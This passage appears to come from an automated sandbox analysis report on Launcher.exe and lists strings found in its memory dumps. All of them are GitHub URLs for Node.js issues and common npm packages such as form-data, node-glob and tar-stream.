        Source: Launcher.exe, 00000000.00000003.1238316997.00000175261AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1233378920.00000175261AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1237502871.00000175260E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/felixge/node-form-data/issues/38
        Source: Launcher.exe, 00000000.00000003.1385411020.0000019CE43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/safe-buffer
        Source: Launcher.exe, 00000000.00000003.1385411020.0000019CE43C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/safe-buffer/issues
        Source: Launcher.exe, 00000000.00000003.1257176949.0000017526217000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/follow-redirects/follow-redirects
        Source: Launcher.exe, 00000000.00000003.1257176949.0000017526217000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/follow-redirects/follow-redirects/issues
        Source: Launcher.exe, 00000000.00000003.1233378920.00000175261AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/form-data/form-data/issues/196
        Source: Launcher.exe, 00000000.00000003.1233378920.00000175261AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/form-data/form-data/issues/262
        Source: Launcher.exe, 00000000.00000003.1233378920.00000175261AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/form-data/form-data/issues/40
        Source: Launcher.exe, 00000000.00000003.1233378920.000001752616E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1238048616.000001752616E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1227628748.0000017526166000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/fresc81/node-winreg.git
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
        Source: Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/grumdrig)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/heycam/webidl/pull/946.
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
        Source: Launcher.exe, 00000000.00000003.1269086365.00000175262B7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1262296562.00000175262B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/core-util-is/issues
        Source: Launcher.exe, 00000000.00000003.1307740753.00000175264EC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/fs.realpath.git
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/inflight
        Source: Launcher.exe, 00000000.00000003.1283123422.0000017526237000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/inflight/issues
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/inflight/issues:
        Source: Launcher.exe, 00000000.00000003.1257176949.0000017526247000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1249845254.0000017526280000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/minimatch
        Source: Launcher.exe, 00000000.00000003.1303177727.000001752622B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1303177727.0000017526212000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1386921235.0000036327841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1312658530.0000017526212000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/node-glob/issues/167
        Source: Launcher.exe, 00000000.00000003.1307740753.00000175264E0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1286340583.000001752614B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1283123422.00000175261E9000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1278227379.0000017526227000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1386921235.0000036327841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/node-glob/issues/205
        Source: Launcher.exe, 00000000.00000003.1273115219.0000017526227000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1275681448.0000017526227000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1273115219.000001752622B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/node-graceful-fs/issues/4
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jasonsaayman)
        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1321060699.000001752667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jcrugzz)
        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jcrugzz)js
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jonschlinkert)
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261F1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1275681448.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jonschlinkert/normalize-path
        Source: Launcher.exe, 00000000.00000003.1275681448.00000175261D1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261532478.00000175261D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jonschlinkert/normalize-path/issues
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
        Source: Launcher.exe, 00000000.00000003.1238316997.00000175261AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1233378920.00000175261AB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1237502871.00000175260E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyent/node/issues/7819
        Source: Launcher.exe, 00000000.00000003.1376098895.000002F972B41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1273115219.0000017526243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jpommerening/node-lazystream
        Source: Launcher.exe, 00000000.00000003.1376098895.000002F972B41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1273115219.0000017526243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jpommerening/node-lazystream.git
        Source: Launcher.exe, 00000000.00000003.1376098895.000002F972B41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1273115219.0000017526243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jpommerening/node-lazystream/issues
        Source: Launcher.exe, 00000000.00000003.1566779691.00000175265FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1566779691.0000017526604000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1557876754.00000175264D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
        Source: Launcher.exe, 00000000.00000003.1256384195.0000017526265000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/balanced-match
        Source: Launcher.exe, 00000000.00000003.1392827074.000000426BF01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/brace-expansion
        Source: Launcher.exe, 00000000.00000003.1262296562.000001752628F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1269086365.000001752628F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/isarray
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1347810479.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kewde)
        Source: Launcher.exe, 00000000.00000003.1537773023.00000175261C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kjur/jsjws/blob/master/rsa.js:
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kkaefer)
        Source: Launcher.exe, 00000000.00000003.1565501812.00000175261E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kripken/emscripten/issues/5820
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
        Source: Launcher.exe, 00000000.00000003.1372258204.000000E02B141000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmp, Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.0000017526283000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264CF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
        Source: Launcher.exe, 00000000.00000003.1372258204.000000E02B141000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.0000017526283000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream/issues
        Source: Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1326595872.000001752627F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1346219788.000001752627F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants
        Source: Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1326595872.000001752627F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1346219788.000001752627F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants.git
        Source: Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants.gitA
        Source: Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1326595872.000001752627F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1346219788.000001752627F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants/issues
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264EC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1277593652.00000175264D4000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1394795834.00000066CD801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/pump
        Source: Launcher.exe, 00000000.00000003.1369452048.0000019773B01000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.00000175262D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream
        Source: Launcher.exe, 00000000.00000003.1369452048.0000019773B01000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream.git
        Source: Launcher.exe, 00000000.00000003.1369452048.0000019773B01000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream.gitA
        Source: Launcher.exe, 00000000.00000003.1369452048.0000019773B01000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream/issues
        Source: Launcher.exe, 00000000.00000003.1370791140.000003E4F2D41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1321060699.000001752667A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mcollina)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1400357051.0000017526152000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mrjjwright)
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mzabriskie)
        Source: Launcher.exe, 00000000.00000003.1227628748.0000017526112000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nickuraltsev)
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
        Source: Launcher.exe, 00000000.00000003.1209423627.0000017525D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/1a96d83a223ff9f05f7d942fb84440d323f7b596/lib/internal/bootstrap/
        Source: Launcher.exe, 00000000.00000003.1306605324.0000017526303000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1323720251.0000017526303000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1300104935.0000017526303000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1306605324.0000017526307000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1386921235.0000036327841000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1365774806.0000020D192C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/b3fcc245fb25539909ef1d5eaa01dbf92e168633/lib/path.js#L56
        Source: Launcher.exe, 00000000.00000003.1259708993.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1274536997.00000175264AA000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1271970158.0000017526383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/v10.8.0/lib/internal/errors.js
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
        Source: Launcher.exe, 00000000.00000003.1257176949.000001752622F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1257176949.000001752621F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1250342958.0000017525B31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/22066
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/34532
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35452
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35862
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39707
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39758
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
        Source: Launcher.exe, 00000000.00000003.1209423627.0000017525D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33229
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33515.
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/3394
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34010
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34103#issuecomment-652002364
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34375
        Source: Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/34385
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/35949#issuecomment-722496598
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/36061#discussion_r533718029
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38248
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38433#issuecomment-828426932
        Source: Launcher.exe, 00000000.00000003.1204276373.0000017525E0A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1184670049.00007FF6C410B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/38614)
        Source: Launcher.exe, 00000000.00000003.1344385465.00000175262DF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/cli)
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/inflight.git
        Source: Launcher.exe, 00000000.00000003.1321060699.00000175266A6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1371928022.0000014E56B81000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-tar/blob/51b6627a1f357d2eb433e7378e5f05e83b7aa6cd/lib/header.js#L349
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1283123422.000001752624B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1283123422.000001752624B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1363544520.000000B6D8841000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy/issues
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy/issuesst
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappyMin
        Source: Launcher.exe, 00000000.00000003.1377999521.000003887EDC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappyortA
        Source: Launcher.exe, 00000000.00000003.1348520940.0000017526152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/orlandov)
        Source: Launcher.exe, 00000000.00000003.1376078593.00000238E3701000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/phated)
        Source: Launcher.exe, 00000000.00000003.1487127017.000002D655780000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build
